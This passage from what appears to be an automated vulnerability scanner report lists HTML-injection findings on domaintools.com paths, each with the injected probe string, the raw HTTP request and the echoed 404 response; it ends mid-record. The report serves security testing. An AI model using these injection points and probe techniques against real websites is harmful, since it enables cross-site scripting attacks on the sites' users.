The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be728"><a>e7eacb76eb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitorbe728"><a>e7eacb76eb4/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:22 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=monitorbe728"><a>e7eacb76eb4">
...[SNIP]...

3.152. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/domain-monitor/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4614d"><a>113abf8024c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/domain-monitor4614d"><a>113abf8024c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:27 GMT
Content-Length: 12153
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-monitor4614d"><a>113abf8024c">
...[SNIP]...

3.153. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/domain-monitor/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21bbd<a>b0bb27b613f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/21bbd<a>b0bb27b613f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:42 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b0bb27b613f">Whois record for "21bbd<a>b0bb27b613f"</a>
...[SNIP]...

3.154. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/name-server-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b6e"><a>88a6b050eed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/name-server-alert61b6e"><a>88a6b050eed/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:36 GMT
Content-Length: 12168
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=name-server-alert61b6e"><a>88a6b050eed">
...[SNIP]...

3.155. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/name-server-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f6f<a>38d4b0dc78f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/f2f6f<a>38d4b0dc78f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:50 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>38d4b0dc78f">Whois record for "f2f6f<a>38d4b0dc78f"</a>
...[SNIP]...

3.156. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/registrant-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ed"><a>4d5586e0472 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/registrant-alertaf2ed"><a>4d5586e0472/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:40 GMT
Content-Length: 12163
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=registrant-alertaf2ed"><a>4d5586e0472">
...[SNIP]...

3.157. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/registrant-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 597e7<a>00fe2604623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/597e7<a>00fe2604623/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:53 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>00fe2604623">Whois record for "597e7<a>00fe2604623"</a>
...[SNIP]...

3.158. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/trademark-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f029d<a>72948e822b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/f029d<a>72948e822b9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:06 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>72948e822b9">Whois record for "f029d<a>72948e822b9"</a>
...[SNIP]...

3.159. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/trademark-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e815"><a>bafa23d7668 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/trademark-alert3e815"><a>bafa23d7668/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:51 GMT
Content-Length: 12158
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=trademark-alert3e815"><a>bafa23d7668">
...[SNIP]...

3.160. http://www.domaintools.com/research/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0b5"><a>6e7a0c8ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research6e0b5"><a>6e7a0c8ea0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:40 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=research6e0b5"><a>6e7a0c8ea0">
...[SNIP]...

3.161. http://www.domaintools.com/research/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9589<a>3ec03712067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /researcha9589<a>3ec03712067/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:53 GMT
Content-Length: 12072
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>3ec03712067">Whois record for "researcha9589<a>3ec03712067"</a>
...[SNIP]...

3.162. http://www.domaintools.com/research/dns/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/dns/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf137"><a>0d360a3a1ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/dnscf137"><a>0d360a3a1ec/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:54 GMT
Content-Length: 12067
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=dnscf137"><a>0d360a3a1ec">
...[SNIP]...

3.163. http://www.domaintools.com/research/dns/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/dns/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37d47<a>809ca84a5c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/dns37d47<a>809ca84a5c0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:08 GMT
Content-Length: 12046
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>809ca84a5c0">Whois record for "dns37d47<a>809ca84a5c0"</a>
...[SNIP]...

3.164. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/hosting-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7bfe8<a>8d83bd06792 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/7bfe8<a>8d83bd06792/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:06 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>8d83bd06792">Whois record for "7bfe8<a>8d83bd06792"</a>
...[SNIP]...

3.165. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/hosting-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe7"><a>d0e56e1de48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/hosting-historyd0fe7"><a>d0e56e1de48/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:54 GMT
Content-Length: 12160
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=hosting-historyd0fe7"><a>d0e56e1de48">
...[SNIP]...

3.166. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/name-server-report/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5a9"><a>fc60e1bbf1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/name-server-reportca5a9"><a>fc60e1bbf1a/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:05 GMT
Content-Length: 12175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=name-server-reportca5a9"><a>fc60e1bbf1a">
...[SNIP]...

3.167. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/name-server-report/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2fcf6<a>b2409955a23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/2fcf6<a>b2409955a23/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:19 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b2409955a23">Whois record for "2fcf6<a>b2409955a23"</a>
...[SNIP]...

3.168. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-ip/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81801<a>c88cfecc2ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-ip81801<a>c88cfecc2ad/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:21 GMT
Content-Length: 12102
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>c88cfecc2ad">Whois record for "reverse-ip81801<a>c88cfecc2ad"</a>
...[SNIP]...

3.169. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-ip/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9674b"><a>2dd03605f86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-ip9674b"><a>2dd03605f86/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12123
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=reverse-ip9674b"><a>2dd03605f86">
...[SNIP]...

3.170. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-whois/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7831a"><a>e8224b58c1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-whois7831a"><a>e8224b58c1f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:20 GMT
